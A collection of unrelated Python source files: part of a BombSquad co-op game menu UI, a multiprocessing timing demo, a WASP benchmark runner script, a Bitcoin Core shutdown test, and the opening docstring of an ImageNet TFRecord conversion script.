ba.widget(edit=self._easy_button, show_buffer_left=100)
if self._selected_campaign_level == 'easyButton':
ba.containerwidget(edit=parent_widget,
selected_child=self._easy_button,
visible_child=self._easy_button)
lock_tex = ba.gettexture('lock')
self._hard_button = ba.buttonwidget(
parent=parent_widget,
position=(h + 30, v2 + 32),
size=(120, 70),
label=ba.Lstr(resource='difficultyHardText'),
button_type='square',
autoselect=True,
enable_sound=False,
on_activate_call=ba.Call(self._set_campaign_difficulty, 'hard'),
on_select_call=ba.Call(self.sel_change, 'campaign', 'hardButton'),
color=sel_color_hard
if self._campaign_difficulty == 'hard' else un_sel_color,
textcolor=sel_textcolor
if self._campaign_difficulty == 'hard' else un_sel_textcolor)
self._hard_button_lock_image = ba.imagewidget(
parent=parent_widget,
size=(30, 30),
draw_controller=self._hard_button,
position=(h + 30 - 10, v2 + 32 + 70 - 35),
texture=lock_tex)
self._update_hard_mode_lock_image()
ba.widget(edit=self._hard_button, show_buffer_left=100)
if self._selected_campaign_level == 'hardButton':
ba.containerwidget(edit=parent_widget,
selected_child=self._hard_button,
visible_child=self._hard_button)
ba.widget(edit=self._hard_button, down_widget=next_widget_down)
h_spacing = 200
campaign_buttons = []
if self._campaign_difficulty == 'easy':
campaignname = 'Easy'
else:
campaignname = 'Default'
items = [
campaignname + ':Onslaught Training',
campaignname + ':Rookie Onslaught',
campaignname + ':Rookie Football', campaignname + ':Pro Onslaught',
campaignname + ':Pro Football', campaignname + ':Pro Runaround',
campaignname + ':Uber Onslaught', campaignname + ':Uber Football',
campaignname + ':Uber Runaround'
]
items += [campaignname + ':The Last Stand']
if self._selected_campaign_level is None:
self._selected_campaign_level = items[0]
h = 150
for i in items:
is_last_sel = (i == self._selected_campaign_level)
campaign_buttons.append(
GameButton(self, parent_widget, i, h, v2, is_last_sel,
'campaign').get_button())
h += h_spacing
ba.widget(edit=campaign_buttons[0], left_widget=self._easy_button)
if self._back_button is not None:
ba.widget(edit=self._easy_button, up_widget=self._back_button)
for btn in campaign_buttons:
ba.widget(edit=btn,
up_widget=self._back_button,
down_widget=next_widget_down)
# Update our existing percent-complete text.
campaign = getcampaign(campaignname)
levels = campaign.levels
levels_complete = sum((1 if l.complete else 0) for l in levels)
# Last level cant be completed; hence the -1.
progress = min(1.0, float(levels_complete) / (len(levels) - 1))
p_str = str(int(progress * 100.0)) + '%'
self._campaign_percent_text = ba.textwidget(
edit=self._campaign_percent_text,
text=ba.Lstr(value='${C} (${P})',
subs=[('${C}',
ba.Lstr(resource=self._r + '.campaignText')),
('${P}', p_str)]))
def _on_tournament_info_press(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.confirm import ConfirmWindow
txt = ba.Lstr(resource=self._r + '.tournamentInfoText')
ConfirmWindow(txt,
cancel_button=False,
width=550,
height=260,
origin_widget=self._tournament_info_button)
def _refresh(self) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
# pylint: disable=cyclic-import
from bastd.ui.coop.gamebutton import GameButton
# (Re)create the sub-container if need be.
if self._subcontainer is not None:
self._subcontainer.delete()
tourney_row_height = 200
self._subcontainerheight = (
620 + self._tournament_button_count * tourney_row_height)
self._subcontainer = ba.containerwidget(
parent=self._scrollwidget,
size=(self._subcontainerwidth, self._subcontainerheight),
background=False,
claims_left_right=True,
claims_tab=True,
selection_loops_to_parent=True)
ba.containerwidget(edit=self._root_widget,
selected_child=self._scrollwidget)
if self._back_button is not None:
ba.containerwidget(edit=self._root_widget,
cancel_button=self._back_button)
w_parent = self._subcontainer
h_base = 6
v = self._subcontainerheight - 73
self._campaign_percent_text = ba.textwidget(
parent=w_parent,
position=(h_base + 27, v + 30),
size=(0, 0),
text='',
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
row_v_show_buffer = 100
v -= 198
h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
simple_culling_h=70,
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=lambda: self._on_row_selected('campaign'))
self._campaign_h_scroll = h_scroll
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=row_v_show_buffer,
autoselect=True)
if self._selected_row == 'campaign':
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
self._campaign_sub_container = ba.containerwidget(parent=h_scroll,
size=(180 + 200 * 10,
200),
background=False)
# Tournaments
self._tournament_buttons: List[Dict[str, Any]] = []
v -= 53
# FIXME shouldn't use hard-coded strings here.
txt = ba.Lstr(resource='tournamentsText',
fallback_resource='tournamentText').evaluate()
t_width = _ba.get_string_width(txt, suppress_warning=True)
ba.textwidget(parent=w_parent,
position=(h_base + 27, v + 30),
size=(0, 0),
text=txt,
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
self._tournament_info_button = ba.buttonwidget(
parent=w_parent,
label='?',
size=(20, 20),
text_scale=0.6,
position=(h_base + 27 + t_width * 1.1 + 15, v + 18),
button_type='square',
color=(0.6, 0.5, 0.65),
textcolor=(0.7, 0.6, 0.75),
autoselect=True,
up_widget=self._campaign_h_scroll,
on_activate_call=self._on_tournament_info_press)
ba.widget(edit=self._tournament_info_button,
left_widget=self._tournament_info_button,
right_widget=self._tournament_info_button)
# Say 'unavailable' if there are zero tournaments, and if we're not
# signed in add that as well (that's probably why we see
# no tournaments).
if self._tournament_button_count == 0:
unavailable_text = ba.Lstr(resource='unavailableText')
if _ba.get_account_state() != 'signed_in':
unavailable_text = ba.Lstr(
value='${A} (${B})',
subs=[('${A}', unavailable_text),
('${B}', ba.Lstr(resource='notSignedInText'))])
ba.textwidget(parent=w_parent,
position=(h_base + 47, v),
size=(0, 0),
text=unavailable_text,
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=0.9)
v -= 40
v -= 198
tournament_h_scroll = None
if self._tournament_button_count > 0:
for i in range(self._tournament_button_count):
tournament_h_scroll = h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=ba.Call(self._on_row_selected,
'tournament' + str(i + 1)))
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=row_v_show_buffer,
autoselect=True)
if self._selected_row == 'tournament' + str(i + 1):
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
sc2 = ba.containerwidget(parent=h_scroll,
size=(self._scroll_width - 24, 200),
background=False)
h = 0
v2 = -2
is_last_sel = True
self._tournament_buttons.append(
self._tournament_button(sc2, h, v2, is_last_sel))
v -= 200
# Custom Games.
v -= 50
ba.textwidget(parent=w_parent,
position=(h_base + 27, v + 30 + 198),
size=(0, 0),
text=ba.Lstr(
resource='practiceText',
fallback_resource='coopSelectWindow.customText'),
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
items = [
'Challenges:Infinite Onslaught',
'Challenges:Infinite Runaround',
'Challenges:Ninja Fight',
'Challenges:Pro Ninja Fight',
'Challenges:Meteor Shower',
'Challenges:Target Practice B',
'Challenges:Target Practice',
]
# Show easter-egg-hunt either if its easter or we own it.
if _ba.get_account_misc_read_val(
'easter', False) or _ba.get_purchased('games.easter_egg_hunt'):
items = [
'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
] + items
# add all custom user levels here..
# items += [
# 'User:' + l.getname()
# for l in getcampaign('User').getlevels()
# ]
self._custom_h_scroll = custom_h_scroll = h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=ba.Call(self._on_row_selected, 'custom'))
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=1.5 * row_v_show_buffer,
autoselect=True)
if self._selected_row == 'custom':
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
sc2 = ba.containerwidget(parent=h_scroll,
size=(max(self._scroll_width - 24,
30 + 200 * len(items)), 200),
background=False)
h_spacing = 200
self._custom_buttons: List[GameButton] = []
h = 0
v2 = -2
for item in items:
is_last_sel = (item == self._selected_custom_level)
self._custom_buttons.append(
GameButton(self, sc2, item, h, v2, is_last_sel, 'custom'))
h += h_spacing
# We can't fill in our campaign row until tourney buttons are in place.
# (for wiring up)
self._refresh_campaign_row()
for i, tbutton in enumerate(self._tournament_buttons):
ba.widget(
edit=tbutton['button'],
up_widget=self._tournament_info_button
if i == 0 else self._tournament_buttons[i - 1]['button'],
down_widget=self._tournament_buttons[(i + 1)]['button']
if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
ba.widget(
edit=tbutton['more_scores_button'],
down_widget=self._tournament_buttons[(
i + 1)]['current_leader_name_text']
if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
ba.widget(edit=tbutton['current_leader_name_text'],
up_widget=self._tournament_info_button if i == 0 else
self._tournament_buttons[i - 1]['more_scores_button'])
for btn in self._custom_buttons:
try:
ba.widget(
edit=btn.get_button(),
up_widget=tournament_h_scroll if self._tournament_buttons
else self._tournament_info_button)
except Exception:
ba.print_exception('Error wiring up custom buttons.')
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
on_activate_call=self._back)
else:
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._back)
# There's probably several 'onSelected' callbacks pushed onto the
# event queue.. we need to push ours too so we're enabled *after* them.
ba.pushcall(self._enable_selectable_callback)
def _on_row_selected(self, row: str) -> None:
if self._do_selection_callbacks:
if self._selected_row != row:
self._selected_row = row
def _enable_selectable_callback(self) -> None:
self._do_selection_callbacks = True
def _tournament_button(self, parent: ba.Widget, x: float, y: float,
select: bool) -> Dict[str, Any]:
sclx = 300
scly = 195.0
data: Dict[str, Any] = {
'tournament_id': None,
'time_remaining': 0,
'has_time_remaining': False,
'leader': None
}
data['button'] = btn = ba.buttonwidget(
parent=parent,
position=(x + 23, y + 4),
size=(sclx, scly),
label='',
button_type='square',
autoselect=True,
on_activate_call=lambda: self.run(None, tournament_button=data))
ba.widget(edit=btn,
show_buffer_bottom=50,
show_buffer_top=50,
show_buffer_left=400,
show_buffer_right=200)
if select:
ba.containerwidget(edit=parent,
selected_child=btn,
visible_child=btn)
image_width = sclx * 0.85 * 0.75
data['image'] = ba.imagewidget(
parent=parent,
draw_controller=btn,
position=(x + 21 + sclx * 0.5 - image_width * 0.5, y + scly - 150),
size=(image_width, image_width * 0.5),
model_transparent=self.lsbt,
model_opaque=self.lsbo,
texture=ba.gettexture('black'),
opacity=0.2,
mask_texture=ba.gettexture('mapPreviewMask'))
data['lock_image'] = ba.imagewidget(
parent=parent,
draw_controller=btn,
position=(x + 21 + sclx * 0.5 - image_width * 0.25,
y + scly - 150),
size=(image_width * 0.5, image_width * 0.5),
texture=ba.gettexture('lock'),
opacity=0.0)
data['button_text'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 20 + sclx * 0.5,
y + scly - 35),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=sclx * 0.76,
scale=0.85,
color=(0.8, 1.0, 0.8, 1.0))
header_color = (0.43, 0.4, 0.5, 1)
value_color = (0.6, 0.6, 0.6, 1)
x_offs = 0
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.entryFeeText'),
v_align='center',
maxwidth=100,
scale=0.9,
color=header_color,
flatness=1.0)
data['entry_fee_text_top'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360,
y + scly - 60),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=60,
scale=1.3,
color=value_color,
flatness=1.0)
data['entry_fee_text_or'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360,
y + scly - 90),
size=(0, 0),
h_align='center',
text='',
v_align='center',
maxwidth=60,
scale=0.5,
color=value_color,
flatness=1.0)
data['entry_fee_text_remaining'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360, y +
scly - 90),
size=(0, 0),
h_align='center',
text='',
v_align='center',
maxwidth=60,
scale=0.5,
color=value_color,
flatness=1.0)
data['entry_fee_ad_image'] = ba.imagewidget(
parent=parent,
size=(40, 40),
draw_controller=btn,
position=(x + 360 - 20, y + scly - 140),
opacity=0.0,
texture=ba.gettexture('tv'))
x_offs += 50
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 447 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.prizesText'),
v_align='center',
maxwidth=130,
scale=0.9,
color=header_color,
flatness=1.0)
data['button_x'] = x
data['button_y'] = y
data['button_scale_y'] = scly
xo2 = 0
prize_value_scale = 1.5
data['prize_range_1_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
text='-',
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_1_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='-',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
data['prize_range_2_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_2_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
data['prize_range_3_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_3_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.currentBestText'),
v_align='center',
maxwidth=180,
scale=0.9,
color=header_color,
flatness=1.0)
data['current_leader_name_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs - (170 / 1.4) * 0.5,
y + scly - 60 - 40 * 0.5),
selectable=True,
click_activate=True,
autoselect=True,
on_activate_call=lambda: self._show_leader(tournament_button=data),
size=(170 / 1.4, 40),
h_align='center',
text='-',
v_align='center',
maxwidth=170,
scale=1.4,
color=value_color,
flatness=1.0)
data['current_leader_score_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs, y + scly - 113 + 10),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=170,
scale=1.8,
color=value_color,
flatness=1.0)
data['more_scores_button'] = ba.buttonwidget(
parent=parent,
position=(x + 620 + x_offs - 60, y + scly - 50 - 125),
color=(0.5, 0.5, 0.6),
textcolor=(0.7, 0.7, 0.8),
label='-',
size=(120, 40),
autoselect=True,
up_widget=data['current_leader_name_text'],
text_scale=0.6,
on_activate_call=lambda: self._show_scores(tournament_button=data))
ba.widget(edit=data['current_leader_name_text'],
down_widget=data['more_scores_button'])
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.timeRemainingText'),
v_align='center',
maxwidth=180,
scale=0.9,
color=header_color,
flatness=1.0)
data['time_remaining_value_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 68),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=180,
scale=2.0,
color=value_color,
flatness=1.0)
data['time_remaining_out_of_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 110),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=120,
scale=0.72,
color=(0.4, 0.4, 0.5),
flatness=1.0)
return data
def _switch_to_league_rankings(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
from bastd.ui.league.rankwindow import LeagueRankWindow
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
assert self._league_rank_button is not None
ba.app.ui.set_main_menu_window(
LeagueRankWindow(origin_widget=self._league_rank_button.get_button(
)).get_root_widget())
def _switch_to_score(
self,
show_tab: Optional[
StoreBrowserWindow.TabID] = StoreBrowserWindow.TabID.EXTRAS
) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
assert self._store_button is not None
ba.app.ui.set_main_menu_window(
StoreBrowserWindow(
origin_widget=self._store_button.get_button(),
show_tab=show_tab,
back_location='CoopBrowserWindow').get_root_widget())
def _show_leader(self, tournament_button: Dict[str, Any]) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account.viewer import AccountViewerWindow
tournament_id = tournament_button['tournament_id']
# FIXME: This assumes a single player entry in leader; should expand
# this to work with multiple.
if tournament_id is None or tournament_button['leader'] is None or len(
tournament_button['leader'][2]) != 1:
ba.playsound(ba.getsound('error'))
return
ba.playsound(ba.getsound('swish'))
AccountViewerWindow(
account_id=tournament_button['leader'][2][0].get('a', None),
profile_id=tournament_button['leader'][2][0].get('p', None),
position=tournament_button['current_leader_name_text'].
get_screen_space_center())
def _show_scores(self, tournament_button: Dict[str, Any]) -> None:
# pylint: disable=cyclic-import
from bastd.ui.tournamentscores import TournamentScoresWindow
tournament_id = tournament_button['tournament_id']
if tournament_id is None:
ba.playsound(ba.getsound('error'))
return
TournamentScoresWindow(
tournament_id=tournament_id,
position=tournament_button['more_scores_button'].
get_screen_space_center())
def is_tourney_data_up_to_date(self) -> bool:
"""Return whether our tourney data is up to date."""
return self._tourney_data_up_to_date
def run(self,
game: Optional[str],
tournament_button: Dict[str, Any] = None) -> None:
"""Run the provided game."""
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
# pylint: disable=too-many-return-statements
# pylint: disable=cyclic-import
from bastd.ui.confirm import ConfirmWindow
from bastd.ui.tournamententry import TournamentEntryWindow
from bastd.ui.purchase import PurchaseWindow
from bastd.ui.account import show_sign_in_prompt
args: Dict[str, Any] = {}
# Do a bit of pre-flight for tournament options.
if tournament_button is not None:
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
if not self._tourney_data_up_to_date:
ba.screenmessage(
ba.Lstr(resource='tournamentCheckingStateText'),
color=(1, 1, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['tournament_id'] is None:
ba.screenmessage(
ba.Lstr(resource='internal.unavailableNoConnectionText'),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['required_league'] is not None:
ba.screenmessage(ba.Lstr(
resource='league.tournamentLeagueText',
subs=[
('${NAME}',
ba.Lstr(
translate=('leagueNames',
tournament_button['required_league'])))
]),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['time_remaining'] <= 0:
ba.screenmessage(ba.Lstr(resource='tournamentEndedText'),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
# Game is whatever the tournament tells us it is.
game = ba.app.accounts.tournament_info[
tournament_button['tournament_id']]['game']
if tournament_button is None and game == 'Easy:The Last Stand':
ConfirmWindow(ba.Lstr(resource='difficultyHardUnlockOnlyText',
fallback_resource='difficultyHardOnlyText'),
cancel_button=False,
width=460,
height=130)
return
# Infinite onslaught/runaround require pro; bring up a store link if
# need be.
if tournament_button is None and game in (
'Challenges:Infinite Runaround',
'Challenges:Infinite Onslaught'
) and not ba.app.accounts.have_pro():
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
else:
PurchaseWindow(items=['pro'])
return
required_purchase: Optional[str]
if game in ['Challenges:Meteor Shower']:
required_purchase = 'games.meteor_shower'
elif game in [
'Challenges:Target Practice', 'Challenges:Target Practice B'
]:
required_purchase = 'games.target_practice'
elif game in ['Challenges:Ninja Fight']:
required_purchase = 'games.ninja_fight'
elif game in ['Challenges:Pro Ninja Fight']:
required_purchase = 'games.ninja_fight'
elif game in [
'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
]:
required_purchase = 'games.easter_egg_hunt'
else:
required_purchase = None
if (tournament_button is None and required_purchase is not None
and not _ba.get_purchased(required_purchase)):
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
else:
PurchaseWindow(items=[required_purchase])
return
self._save_state()
# For tournaments, we pop up the entry window.
if tournament_button is not None:
TournamentEntryWindow(
tournament_id=tournament_button['tournament_id'],
position=tournament_button['button'].get_screen_space_center())
else:
# Otherwise just dive right in.
assert game is not None
if ba.app.launch_coop_game(game, args=args):
ba.containerwidget(edit=self._root_widget,
transition='out_left')
def _back(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.play import PlayWindow
# If something is selected, store it.
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.ui.set_main_menu_window(
PlayWindow(transition='in_left').get_root_widget())
def _restore_state(self) -> None:
try:
sel_name = ba.app.ui.window_states.get(type(self),
{}).get('sel_name')
if sel_name == 'Back':
sel = self._back_button
elif sel_name == 'Scroll':
sel = self._scrollwidget
elif sel_name == 'PowerRanking':
sel = self._league_rank_button_widget
elif sel_name == 'Store':
sel = self._store_button_widget
else:
sel = self._scrollwidget
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
def _save_state(self) -> None:
cfg = ba.app.config
try:
sel = self._root_widget.get_selected_child()
if sel == self._back_button:
sel_name = 'Back'
elif sel == self._store_button_widget:
sel_name = 'Store'
elif sel == self._league_rank_button_widget:
sel_name = 'PowerRanking'
elif sel == self._scrollwidget:
sel_name = 'Scroll'
else:
raise ValueError('unrecognized selection')
ba.app.ui.window_states[type(self)] = {'sel_name': sel_name}
except Exception:
ba.print_exception(f'Error saving state for {self}.')
cfg['Selected Coop Row'] = self._selected_row
cfg['Selected Coop Custom Level'] = self._selected_custom_level
cfg['Selected Coop Challenge Level'] = self._selected_challenge_level
cfg['Selected Coop Campaign Level'] = self._selected_campaign_level
cfg.commit()
def sel_change(self, row: str, game: str) -> None:
"""(internal)"""
if self._do_selection_callbacks:
if row == 'custom':
self._selected_custom_level = game
if row == 'challenges':
self._selected_challenge_level = game
elif row == 'campaign':
self._selected_campaign_level = game
|
mp.py | import multiprocessing as mp
import time
import os
import random
q = mp.Queue() #FIFO
a_list = []
def worker(a_list):
a_list_square = [val ** 2 for val in a_list]
q.put(a_list_square)
if __name__ == '__main__':
nums = [random.randint(1, 50) for i in range(10**7)]
chunk = len(nums) // 8
procs = []
t = time.time()
for i in range(8):
start = i * chunk
stop = (i + 1) * chunk
current_nums = nums[start:stop]
p = mp.Process(target=worker, args=(current_nums,))
procs.append(p)
p.start()
results = [q.get() for i in range(8)]
total_time = time.time() - t
print("total time for mp", total_time)
final_result = []
for result in results:
final_result += result
total_time_cat = time.time() - t
print("total time for mp after concat", total_time_cat)
for p in procs:
p.join()
t = time.time()
result2 = [num ** 2 for num in nums]
total_time = time.time() - t
print("total time for list comp", total_time)
# pid = os.getpid()
# print(f'Main has pid {pid}')
# p1 = mp.Process(target=worker, args=(5, 1))
# p2 = mp.Process(target=worker, args=(15, 2))
# p1.start()
# p2.start()
# print(f'first item in queue {q.get()}')
# print(f'second item in queue {q.get()}')
# print('the list ', a_list) |
run.py | #!/usr/bin/env python3
import os
import sys
import csv
import glob
import time
import json
import logging
import resource
import threading
import subprocess
# constants ------------------------------------------------
THREADS=1
TIMEOUT=900
INSTR_MAX=4000000000000000000
# globals --------------------------------------------------
dirs = glob.glob(f'_build/tests')
table = [['test', 'spec', 'Twasp', 'Tloop', 'Tsolver', 'paths', 'Cov']]
errors = list()
# helpers --------------------------------------------------
cmd = lambda p, r : [
'wasp',
p,
'-e',
f'(invoke \"__original_main\")',
'-b',
'-m',
str(INSTR_MAX),
'--workspace', r,
'--smt-assume'
]
def limit_ram() -> None:
limit = 15 * 1024 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
def run(test: str, out_dir: str):
try:
out = subprocess.check_output(
cmd(test, out_dir),
timeout=TIMEOUT,
stderr=subprocess.STDOUT,
preexec_fn=limit_ram
)
except (subprocess.CalledProcessError, \
subprocess.TimeoutExpired) as e:
logging.error('crashed')
return None
return out
#-----------------------------------------------------------
# main -----------------------------------------------------
fmt = '%(asctime)s: %(message)s'
date_fmt = '%H:%M:%S'
logging.basicConfig(format=fmt, level=logging.INFO, \
datefmt=date_fmt)
def main(argv):
tests = []
lock = threading.Lock()
def run_benchmark(test):
out_dir = os.path.join('output', os.path.basename(test))
t0 = time.time()
run(test, out_dir)
delta = time.time() - t0
report_file = os.path.join(out_dir, 'report.json')
if not os.path.exists(report_file):
lock.acquire()
errors.append(test)
lock.release()
logging.info(f'Crashed/Timeout {os.path.basename(test)}')
return
with open(report_file, 'r') as f:
try:
report = json.load(f)
except json.decoder.JSONDecodeError:
logging.info(f'Thread {i}: Can not read report \'{report_file}\'.')
return
if not report['specification']:
lock.acquire()
errors.append(test)
lock.release()
logging.info(f'Test {os.path.basename(test)} ' \
f'({report["specification"]}, ' \
f'T={round(delta,2)}s, L={float(report["loop_time"])}, S={float(report["solver_time"])}' \
f'{report["paths_explored"]})')
lock.acquire()
table.append([
f'{test}',
report['specification'],
round(delta, 2),
float(report['loop_time']),
float(report['solver_time']),
report['paths_explored'],
report['coverage']
])
lock.release()
def t_loop(i):
while True:
try:
lock.acquire()
test = tests.pop()
except IndexError:
break
finally:
lock.release()
run_benchmark(test)
if argv == []:
for dir in dirs:
tests = tests + glob.glob(f'{dir}/*.wat')
else:
tests = argv
threads = []
for i in range(THREADS):
t = threading.Thread(target=t_loop, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
with open('table.csv', 'w', newline='') as f:
writer = csv.writer(f)
writer.writerows(table)
for err in errors:
logging.info('Failed Test: ' + err)
if __name__ == '__main__':
main(sys.argv[1:])
#-----------------------------------------------------------
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test bitcoind shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
